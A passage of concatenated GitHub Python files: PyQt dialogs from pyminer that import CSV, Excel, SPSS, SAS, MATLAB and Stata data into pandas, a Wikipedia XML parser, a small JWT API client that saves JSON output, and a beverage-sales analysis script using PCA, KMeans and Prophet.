filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "c",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"sep": self.comboBox_separator.currentText(),
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
"encoding": self.comboBox_encode.currentText(),
"nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
"skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
}
)
def importDatasetReload(self):
"""
刷新导入的数据
file_path: 导入路径
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
# CSV一次只导入一个文件,因此默认变名称即为数据集名称
self.current_dataset[varname] = pd.read_csv(**param)
run_command("", "pd.read_csv(%s)" % kwargs_to_str(param))
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
dataset = self.current_dataset[self.import_param["datasetname"]]
if self.comboBox_separator.currentText() == "(无)":
preview_data = pd.DataFrame({"文本": [dataset[:100]]})
header = True
else:
preview_data = dataset.head(100)
header = self.checkBox_ifColumns.isChecked()
self.showDatasetPreview(data=preview_data, header=header)
# 后续还需要进一步优化方案
class ImportExcelForm(ImportDialog, dataImportFormEngine):
"""打开excel导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.IconPath = ":/resources/icons/excel.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.new_import_filepath = ""
self.file_types = "*.xls *.xlsx"
self.sheetsname = []
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_ifColIndex.stateChanged.connect(self.previewButton) # 首列是否为列名
self.comboBox_sheetname.currentTextChanged.connect(self.updateTableView) # 切换页面
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_ifColumns) # 首行为列名
self.horizontalLayoutAddUI(self.checkBox_ifColIndex) # 首列为行名
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left") # 数据集名称
self.verticalLayoutAddUI(self.comboBox_sheetname, "right") # 页面名称
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left") # 限制行数
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right") # 跳过行数
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取Excel里头的页面信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
# Excel 部分,默认都是全部数据导入后在内存中做处理, 因此 ispreview 都是 False
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={}, loaddataset=False, ismerge=True,
limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
param={
"io": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "python",
"sheet_name": "",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"nrows": None, # 默认全部加载,在内存中做处理
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
"skiprows": 0
}
)
if self.import_message["isError"]:
return
if self.new_import_filepath != self.import_param["filepath"]:
# 当前仅当文件路径发生变化时候进行重载,否则以内存中数据呈现对应变化
self.import_param.update(loaddataset=True)
self.LoadSheetname()
def LoadSheetname(self):
"""预先加载 sheetname 信息"""
ftype = os.path.split(self.import_param["filepath"])[1].endswith("xls")
# 获取excel 工作簿中所有的sheet,设置 sheet 名
if ftype:
# 针对 xls 格式
wb = xlrd.open_workbook(self.import_param["filepath"])
self.sheetsname = wb.sheet_names()
else:
# 针对 xlsx 格式
wb = openpyxl.load_workbook(self.import_param["filepath"], read_only=True)
self.sheetsname = wb.sheetnames
# 选择导入引擎
self.import_param["param"].update(engine='xlrd' if ftype else 'openpyxl')
# 如果存在多个页面时,需要考虑到将Excel文件中所有页面都导入,因此通过(全部导入)作为标识
# self.updateChooseTagName(self.comboBox_sheetname, tagname = self.sheetsname)
self.comboBox_sheetname.clear()
tagname = ["(全部导入)"] + self.sheetsname if len(self.sheetsname) > 1 else self.sheetsname
for v in tagname:
# 更新Excel导入界面中"数据位置"列表
self.comboBox_sheetname.addItem(v)
def importDatasetReload(self):
"""
刷新导入的数据
"""
if self.import_param["loaddataset"]:
param = self.import_param["param"]
self.current_dataset = {}
for sheet_i in self.sheetsname:
# 默认都是全部加载后在处理
param.update(sheet_name=sheet_i)
self.current_dataset[sheet_i] = pd.read_excel(**param)
run_command("", "pd.read_excel(%s)" % kwargs_to_str(param))
if not self.import_param["ispreview"]:
sheet_ind = self.comboBox_sheetname.currentText()
if sheet_ind != "(全部导入)":
self.import_param.update(ismerge=False)
self.current_dataset = {sheet_ind: self.current_dataset[sheet_ind]}
for name_i, temp in self.current_dataset.items():
if not self.import_param["hasheader"]:
temp = self.headerAsColumns(temp)
self.current_dataset[name_i] = self.datasetUpdate(
data=temp, limitrow=self.import_param["limitrows"], skiprow=self.import_param["skiprows"]
)
self.new_import_filepath = self.import_param["filepath"]
self.getDatasetInfo()
self.import_param.update(status=True, loaddataset=False)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
self.updateDatasetNameLine(tag=self.comboBox_sheetname.currentText())
if not self.import_param["status"]:
self.showDatasetPreview(data=pd.DataFrame([]))
return
# 首行是否为列名
header = self.checkBox_ifColumns.isChecked()
# 获取当前选择的表格信息
load_sheet = self.comboBox_sheetname.currentText()
l = self.import_param["limitrows"]
s = self.import_param["skiprows"]
if load_sheet == "(全部导入)":
temp = []
for name_i, data_i in self.current_dataset.items():
if not header:
data_i = self.headerAsColumns(data_i)
data_i = self.datasetUpdate(data_i, limitrow=l, skiprow=s)
row_i, col_i = data_i.shape
temp.append([name_i, row_i, col_i, data_i.columns.tolist()])
header = True # 避免呈现矩阵时候效果出现问题
preview_data = pd.DataFrame(temp, columns=["表名称", "行数", "列数", "列名称"])
else:
preview_data = self.datasetUpdate(self.current_dataset[load_sheet], limitrow=l, skiprow=s)
self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportSpssForm(ImportDialog, dataImportFormEngine):
"""
打开"从spss导入"窗口
"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.sav"
self.IconPath = ":/resources/icons/spss.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_encode.currentIndexChanged.connect(self.previewButton) # 选择编码方式
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.encode_type = ["gbk", "utf8", "gb2312", "ascii"]
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
param={
"filename_path": self.checkFilePath(self.lineEdit_filePath.text()),
"encoding": self.comboBox_encode.currentText()
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
import pyreadstat
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname], meta = pyreadstat.read_sav(**param)
# SPSS一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportSasForm(ImportDialog, dataImportFormEngine):
"""打开从sas导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.sas7bdat"
self.IconPath = ":/resources/icons/sas.ico"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
# 导入窗口的相关事件
# 在"导入"窗口,打开选择文件
self.pushButton_choosefile.clicked.connect(self.chooseFileButton)
# 帮助
self.pushButton_help.clicked.connect(self.showHelp)
# 配置更新数据
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_encode.currentIndexChanged.connect(self.previewButton) # 选择编码方式
# 按键更新数据
self.pushButton_preview.clicked.connect(self.previewButton) # 预览
self.pushButton_ok.clicked.connect(self.importDatasetButton) # 导入
self.pushButton_cancel.clicked.connect(self.close) # 取消
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"format": "sas7bdat",
"encoding": self.comboBox_encode.currentText()
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname] = pd.read_sas(**param)
# SPSS一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportMatlabForm(ImportDialog, dataImportFormEngine):
"""打开matlab导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.new_import_filepath = ""
self.file_types = "*.mat"
self.IconPath = ":/resources/icons/matlab.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_asDataFrame.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_varname.currentTextChanged.connect(self.updateTableView)
def updateUIForm(self):
"""ImportMatlabForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_asDataFrame)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_varname, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(), loaddataset=False,
status=False, varname={}, dtypes={}, ismerge=True,
asdataframe=self.checkBox_asDataFrame.isChecked(),
param={
"file_name": self.checkFilePath(self.lineEdit_filePath.text())
}
)
if self.import_message["isError"]:
return
if self.new_import_filepath != self.import_param["filepath"]:
# 当前仅当文件路径发生变化时候进行重载,否则以内存中数据呈现对应变化
self.import_param.update(loaddataset=True)
def importDatasetReload(self):
"""
刷新导入的数据
"""
if self.import_param["loaddataset"]:
import scipy.io as sio
param = self.import_param["param"]
self.current_dataset = {}
mat_dataset = sio.loadmat(**param)
self.new_import_filepath = self.import_param["filepath"]
for name_i, var_i in mat_dataset.items():
if type(var_i) == np.ndarray and name_i[:2] != "__":
# 只保留数组类型的数据
# 由于部分非矩阵类型数据也是使用 ndarray 类型存储,因此只能使用 type 获取到的类型和 np.ndarray来比较
# 这样才能定位到需要的数组类型数据
# 注意:目前 scipy.io.loadmat 方法无法解析 matlab 的 table 类型数据!
# 预留一种场景:导入时候以 DataFrame 还是 ndarray 形式
self.current_dataset[name_i] = var_i
self.import_param.update(status=True, loaddataset=False)
self.updateChooseTagName(self.comboBox_varname)
if not self.import_param["ispreview"]:
for name_i, var_i in self.current_dataset.items():
self.current_dataset[name_i] = pd.DataFrame(var_i) if self.import_param["asdataframe"] and len(
var_i.shape) <= 2 else var_i
varname = self.comboBox_varname.currentText()
if varname != "(全部导入)":
self.import_param.update(ismerge=False)
self.current_dataset = {varname: self.current_dataset[varname]}
self.getDatasetInfo() # 更新当前数据集的信息
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
varname = self.comboBox_varname.currentText()
self.clearPreviewDataTableWidget()
self.updateDatasetNameLine(tag=varname)
if not self.import_param["status"]:
self.showDatasetPreview(data=pd.DataFrame([]))
return
if varname == "(全部导入)":
temp = []
for name_i, data_i in self.current_dataset.items():
temp.append([name_i, data_i.shape, type(data_i)])
preview_data = pd.DataFrame(temp, columns=["表名称", "大小", "数据格式"])
elif not varname:
return
else:
temp = self.current_dataset[varname]
if len(self.current_dataset[varname].shape) > 2:
temp = pd.DataFrame([{
"变量": varname, "数据类型": type(temp), "数据格式": temp.dtype,
"大小": self.current_dataset[varname].shape
}])
else:
temp = pd.DataFrame(self.current_dataset[varname][0:100])
temp.columns = ["C" + str(i + 1) for i in range(temp.shape[1])]
preview_data = temp
self.showDatasetPreview(data=preview_data, header=True)
# 优化完成
class ImportStataForm(ImportDialog, dataImportFormEngine):
"""打开stata导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.dta"
self.IconPath = ":/resources/icons/stata.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColIndex.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
def updateUIForm(self):
"""ImportMatlabForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=True,
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname] = pd.read_stata(**param)
# Stata一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
| pyminer/pyminer | pyminer/packages/dataio/sample.py | sample.py | py | 47,148 | python | zh | code | 77 | github-code | 36 |
31897243562 | from bs4 import BeautifulSoup
from collections import defaultdict, Counter
class Parser:
@staticmethod
def getWordsArticle(file):
words = []
with open(file, encoding='utf-8') as f:
for line in f:
line = line.split(" => ")
word = line[0].replace("#", "")
count = int(line[1].replace("\n", ""))
words.append((word, count))
return words
@staticmethod
def getAllPages(file):
handler = open(file).read()
soup = BeautifulSoup(handler, 'xml')
return soup.find_all('page')
@staticmethod
def getText(page):
soup = BeautifulSoup(page, 'html.parser')
return soup.title
@staticmethod
def getRefs(text):
soup = BeautifulSoup(text, 'html.parser')
return soup.find_all('ref')
@staticmethod
def solveMatches(matches):
count = Counter([x[0] for x in matches]).most_common()
# If there is no tie
if count[0][1] != count[1][1]:
return count[0][0]
# We only want to look at categories with the same numbers of appearance as the most common one
max_cats = [match[0] for match in count if match[1] == count[0][1]]
# If there is a tie we sum the distances and take the shortest
# If there is a tie between the summed distances, we just take the last one
distance_dict = defaultdict(int)
for k, v in matches:
if k in max_cats:
distance_dict[k] += v
return Counter(distance_dict).most_common()[-1][0]
| cenh/Wikipedia-Heavy-Hitters | Parser.py | Parser.py | py | 1,600 | python | en | code | 3 | github-code | 36 |
31329677612 | import requests
from requests import HTTPError
import yaml
import json
import os
def load_config():
config_path = 'api_config.yaml'
with open(os.path.join(os.getcwd(), config_path), mode='r') as yaml_file:
config = yaml.safe_load(yaml_file)
return config
def auth():
conf = load_config()['api_handle']
url = conf['url']+conf['endpoint_auth']
data = json.dumps(conf['credentials'])
headers = {"content-type": "application/json"}
try:
result = requests.post(url, data=data, headers=headers)
result.raise_for_status()
token = "JWT " + result.json()['access_token']
return request(token)
except HTTPError:
print('Exception with:')
print(conf['url']+conf['endpoint'])
def get(url, date, headers):
try:
result = requests.get(url
, data=json.dumps({"date": date})
, headers=headers
, timeout=10)
return result.json()
except HTTPError:
print('Error')
def save(inp):
name = inp[0]['date']
path = os.path.join(os.getcwd(), f'data/{name}')
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError:
print("Creation of the directory %s failed" % path)
else:
print("Successfully created the directory %s" % path)
with open(f'{path}/out_{name}.json', 'w') as json_file:
json.dump(inp, json_file)
def request(token):
conf = load_config()['api_handle']
url = conf['url'] + conf['endpoint_get']
start_date = conf['start_date']
headers = conf['headers']
headers['authorization'] = token
result = None
if isinstance(result, dict) \
and (result['message'] == 'No out_of_stock items for this date'):
print('Empty Date')
else:
result = get(url, start_date, headers)
save(result)
if __name__ == '__main__':
auth()
| daniiche/DE | hmwrk4/airflow/dags/api_handle_airflow.py | api_handle_airflow.py | py | 1,987 | python | en | code | 0 | github-code | 36 |
34697431338 | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 20 06:20:43 2022
@author: beauw
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import itertools
from pandas import to_datetime
from prophet import Prophet
from pandas import DataFrame
from matplotlib import pyplot
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
from prophet.diagnostics import cross_validation
from prophet.diagnostics import performance_metrics
from prophet.plot import plot_cross_validation_metric
from sklearn.decomposition import PCA
# Import raw data sets. Then, combine variables into one mother dataframe.
#########################################################################
# Import demographics of customers living in the region of each wholesaler.
demographics = pd.read_csv()
# Major events - such as holidays, Superbowl, big soccer games, etc.
major_events = pd.read_csv()
# Change YearMonth to Date/Time
major_events['YearMonth'] = pd.to_datetime(
major_events['YearMonth'], format='%Y%m')
# Historical volume of each SKU
historical_volume = pd.read_csv()
# Change YearMonth to Date/Time
historical_volume['YearMonth'] = pd.to_datetime(
historical_volume['YearMonth'], format='%Y%m')
# Overall industry soda sales
industry_soda_sales = pd.read_csv()
# Change YearMonth to Date/Time
industry_soda_sales['YearMonth'] = pd.to_datetime(
industry_soda_sales['YearMonth'], format='%Y%m')
# Overall industry beer volume
industry_volume = pd.read_csv()
# Change Yearmonth to Date/Time
industry_volume['YearMonth'] = pd.to_datetime(
industry_volume['YearMonth'], format='%Y%m')
# Any promotions matched up to Year Month
price_sales_promotion = pd.read_csv()
# Change YearMonth to Date/Time
price_sales_promotion['YearMonth'] = pd.to_datetime(
price_sales_promotion['YearMonth'], format='%Y%m')
# Average temperature of YearMonth in relation to each wholesaler's region
weather = pd.read_csv()
# Change YearMonth to Date/Time
weather['YearMonth'] = pd.to_datetime(weather['YearMonth'], format='%Y%m')
# Merge all variables that depend on SKUs into one data frame - stacking
# on top of Agency, SKU, and then YearMonth
sku_dataframe = historical_volume.merge(
price_sales_promotion, on=['Agency', 'SKU', 'YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
industry_soda_sales, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
industry_volume, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(major_events, on=['YearMonth'], how='left')
# Merge all variables that depend on Agencies (AKA distributors) by eliminating duplicates
Agency_dataframe = weather.merge(demographics, on=['Agency'], how='left')
# Let's take a look at all the Agencies
#week4_dataframe_agencies = Agency_dataframe.copy()
#week4_dataframe_agencies = week4_dataframe_agencies.groupby('Agency')
# This does not perform well in the Spyder IDE
# Merge both major dataframes (ones depending on SKUs and on Agencies) into one big dataframe
mother_dataframe = sku_dataframe.merge(
Agency_dataframe, on=['YearMonth', 'Agency'], how='left')
# Turn the categorical SKU data into booleans columns instead. Also making
#a data frame for a PCA run.
PCAmother_df = mother_dataframe.copy()
mother_dataframe = pd.get_dummies(
mother_dataframe, columns=['SKU'], dummy_na=False)
# Check on null values in the newly formed large dataframe. Let's also check
# out the statistics.
mother_dataframe.isnull().sum()
# Import the testing data now...
testing_dataframe = pd.read_csv(
r'C:\Users\beauw\OneDrive\Desktop\Machine Learning\OSU - Data Mining Project\volume_forecast.csv')
# Visualize variables graphically that may relate with volume
# plt.scatter(mother_dataframe['Avg_Max_Temp'],mother_dataframe['Volume'])
# plt.scatter(mother_dataframe['Promotions'],mother_dataframe['Volume'])
# Let's drop the Fifa World Cup and Football Gold cup due to 0 value
# contributions.
mother_dataframe.drop(
columns=['FIFA U-17 World Cup', 'Football Gold Cup'], inplace=True)
#Making a data frame for just SKU1 and Agency 1
agency1_SKU1_df = mother_dataframe.copy()
agency1_SKU1_df.query(
'Agency == "Agency_01" and SKU_SKU_01 == 1', inplace=True)
agency1_SKU1_df.drop('SKU_SKU_02', axis=1, inplace=True)
agency1_SKU1_df.drop('SKU_SKU_01', axis=1, inplace=True)
#####################################################################
#####################################################################
#####################################################################
# Create a heatmap of all variables - take a close note of volume correlation
corr = mother_dataframe[mother_dataframe.columns[:21]].corr()
plt.figure(figsize=(12, 12))
sns.heatmap(corr, vmin=-1, cmap='BuPu', annot=True, fmt=".2f")
plt.show()
######################################################################
# Create a factor plot against time and volume with various variables
##THIS TAKES SERIOUS TIME AND CPU USEAGE (Thus the #s)!!
#sns.catplot(x ='YearMonth', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Price', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Promotions', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Population_2017', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Yearly_Household_Income_2017', y ='Volume', data = mother_dataframe)
# These all took a very long time to process. Saved plot pictures for later use.
######################################################################
#Find optimal number of components for ALL data using PCA. I also stacked and
#scaled the SKU data back into one column for this input.
label_encoder = preprocessing.LabelEncoder()
PCAprescaled = PCAmother_df.copy()
PCAprescaled.drop(PCAprescaled.loc[:,'Easter Day':'Music Fest'], axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled['Agency'] = label_encoder.fit_transform(PCAprescaled['Agency'])
PCAprescaled['YearMonth'] = label_encoder.fit_transform(PCAprescaled['YearMonth'])
PCAprescaled['SKU'] = label_encoder.fit_transform(PCAprescaled['SKU'])
PCAscaled = SS.fit_transform(PCAprescaled)
PCAmodel = PCA(random_state=5000).fit(PCAscaled)
plt.plot(PCAmodel.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
#optimal number of components for just SKU1 and Agency 1
PCAprescaled2 = agency1_SKU1_df.copy()
PCAprescaled2.drop(PCAprescaled2.iloc[:,8:17], axis=1, inplace=True)
PCAprescaled2.drop('Agency', axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled2['YearMonth'] = label_encoder.fit_transform(PCAprescaled2['YearMonth'])
PCAscaled2 = SS.fit_transform(PCAprescaled2)
PCAmodel2 = PCA(random_state=5000).fit(PCAscaled2)
plt.plot(PCAmodel2.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel2.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
######################################################################
# WCSS Elbow method - then plot KMeans
# After looking at WCSS, the only viable options seem to be pricing
# And promotions.
# Pricing first. I am encoding YearMonth column to include dates as variables
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq0 = mother_dataframe.copy()
label_encoder = preprocessing.LabelEncoder()
mother_df_Seq0['YearMonth'] = label_encoder.fit_transform(mother_df_Seq0['YearMonth'])
price_trans_x = mother_df_Seq0.iloc[:, [1, 2, 3]].values
Standard_Scale = StandardScaler()
Standard_Scale.fit_transform(price_trans_x[:,1:3])
wcss = []
for i in range(1, 11):
pricekmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
pricekmeans.fit(price_trans_x)
wcss.append(pricekmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Price - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
price_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
price_z_kmeans = price_y_kmeans.fit_predict(price_trans_x)
price_u_labels = np.unique(price_z_kmeans)
print(price_u_labels)
# Plot the centroids
plt.scatter(price_trans_x[price_z_kmeans == 0, 0],
price_trans_x[price_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(price_trans_x[price_z_kmeans == 1, 0],
price_trans_x[price_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(price_trans_x[price_z_kmeans == 2, 0],
#price_trans_x[price_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
#plt.scatter(price_trans_x[price_z_kmeans==3, 0], price_trans_x[price_z_kmeans==3, 1], s=100, c='cyan', label ='Cluster 4')
plt.scatter(price_y_kmeans.cluster_centers_[:, 0], price_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Pricing')
plt.xlabel('Pricing ')
plt.ylabel('Volume')
plt.show()
# Now Promotions..
promo_trans_x = mother_df_Seq0.iloc[:, [1, 2, 5]].values
Standard_Scale.fit_transform(promo_trans_x[[1]])
Standard_Scale.fit_transform(promo_trans_x[[2]])
Standard_Scale.fit_transform(promo_trans_x[[5]])
wcss = []
for i in range(1, 11):
promokmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
promokmeans.fit(promo_trans_x)
wcss.append(promokmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Promotions - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
promo_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
promo_z_kmeans = promo_y_kmeans.fit_predict(promo_trans_x)
promo_u_labels = np.unique(promo_z_kmeans)
print(promo_u_labels)
# Plot the centroids
plt.scatter(promo_trans_x[promo_z_kmeans == 0, 0],
promo_trans_x[promo_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(promo_trans_x[promo_z_kmeans == 1, 0],
promo_trans_x[promo_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(promo_trans_x[promo_z_kmeans == 2, 0],
#promo_trans_x[promo_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(promo_y_kmeans.cluster_centers_[:, 0], promo_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Promotions')
plt.xlabel('Promotions')
plt.ylabel('Volume')
plt.show()
# Let's do Sales, Pricing, Promotions, Volume, Yearly Household Income, and
# Average Population via multi-Kmeans clustering. See if all these together
#does anything...
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'Soda_Volume':'Avg_Max_Temp'], axis=1, inplace=True)
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'SKU_SKU_01':'SKU_SKU_34'], axis=1, inplace=True)
mother_df_Seq.drop('Agency', axis=1, inplace=True)
mother_df_Seq['YearMonth'] = label_encoder.fit_transform(mother_df_Seq['YearMonth'])
#mother_df_Seq.drop('YearMonth', axis=1, inplace=True)
SS = StandardScaler()
Blob_df = SS.fit_transform(mother_df_Seq.iloc[:,0:7])
blob_trans_x = Blob_df
wcss = []
for i in range(1, 11):
blobkmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
